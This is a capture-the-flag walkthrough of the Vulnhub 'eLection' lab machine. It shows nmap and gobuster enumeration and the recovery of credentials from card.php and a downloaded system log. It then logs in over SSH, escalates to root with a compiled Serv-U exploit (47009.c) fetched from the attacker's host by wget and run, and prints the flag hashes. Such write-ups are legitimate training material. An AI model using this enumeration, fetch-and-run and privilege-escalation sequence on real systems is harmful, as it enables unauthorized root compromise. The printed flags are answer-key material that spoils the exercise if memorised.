Vulnhub - eLection

Hi all, this was a really easy box let’s pwn it!

You can find the machine there > eLection

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ip=192.168.1.15
$ nmap -sC -sV -p- -oN initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 00:35 EEST
Nmap scan report for election.zte.com.cn (192.168.1.15)
Host is up (0.00082s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:B2:39:C7 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

When we visit the webpage, we can see the apache2 default page. I always check first for robots.txt and we see these directories:

1
2
3
4
admin
wordpress
user
election

Only the /election is working and it runs some kind of webapp (?) :

Let’s run gobuster on it.

1
2
3
4
5
6
7
8
9
10
$ gobuster dir -q -u http://$ip/election/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html -o gobuster.txt
/media (Status: 301)
/themes (Status: 301)
/data (Status: 301)
/admin (Status: 301)
/index.php (Status: 200)
/lib (Status: 301)
/languages (Status: 301)
/js (Status: 301)
/card.php (Status: 200)

Shell as love

/card.php has binary data in let’s decode them.

Perfect 1234:Zxc123!@# we can login with them under /admin. Under settings now we can download some logs:

These logs have this in:

1
2
3
4
5
6
7
$ cat system.log 
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
[2020-07-09 18:23:29] Love has been logged in from Unknown IP on Firefox (Linux).
[2020-07-09 18:24:28]  has been logged out from Unknown IP.
[2020-07-10 03:20:21] Love has been logged in from Unknown IP on Firefox (Linux).

We can use them with SSH.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ ssh love@$ip
love@192.168.1.15's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Jul  9 18:27:37 2020 from 192.168.1.16
love@election:~$ 

love -> root - Exploiting Serv-U

Perfect, now privesc is pretty easy. Let’s search for SUID binaries.

1
2
3
4
5
6
7
8
9
10
11
12
love@election:~$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U

Serv-U seems interesting, let’s search for possible local privilege escalation exploits.

1
2
3
4
5
$ searchsploit Serv-U | grep Privilege
RhinoSoft Serv-U FTP Server 3.x < 5.x - Local Privilege Escalation                                                                                     | windows/local/381.c
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)                                                                              | linux/local/47072.rb
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)                                                                                            | linux/local/47009.c
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)                                                                                            | multiple/local/47173.sh

linux/local/47009.c Seems perfect, let’s mirror it and compile it.

1
2
3
4
5
6
7
8
9
10
11
$ searchsploit -m linux/local/47009.c
  Exploit: Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
      URL: https://www.exploit-db.com/exploits/47009
     Path: /usr/share/exploitdb/exploits/linux/local/47009.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /root/Documents/vulnhub/election/47009.c

$ gcc 47009.c -o root
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Let’s wget it now and run it.

1
2
3
4
5
6
7
8
love@election:~$ cd /tmp
love@election:/tmp$ wget -q 192.168.1.16/root
love@election:/tmp$ chmod +x root; ./root
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)

Bingo! :D Let’s read the flags:

1
2
3
4
# cat /root/root.txt
5238feefc4ffe09645d97e9ee49bc3a6
# cat /home/love/Desktop/user.txt
cd38ac698c0d793a5236d01003f692b0

Was fun.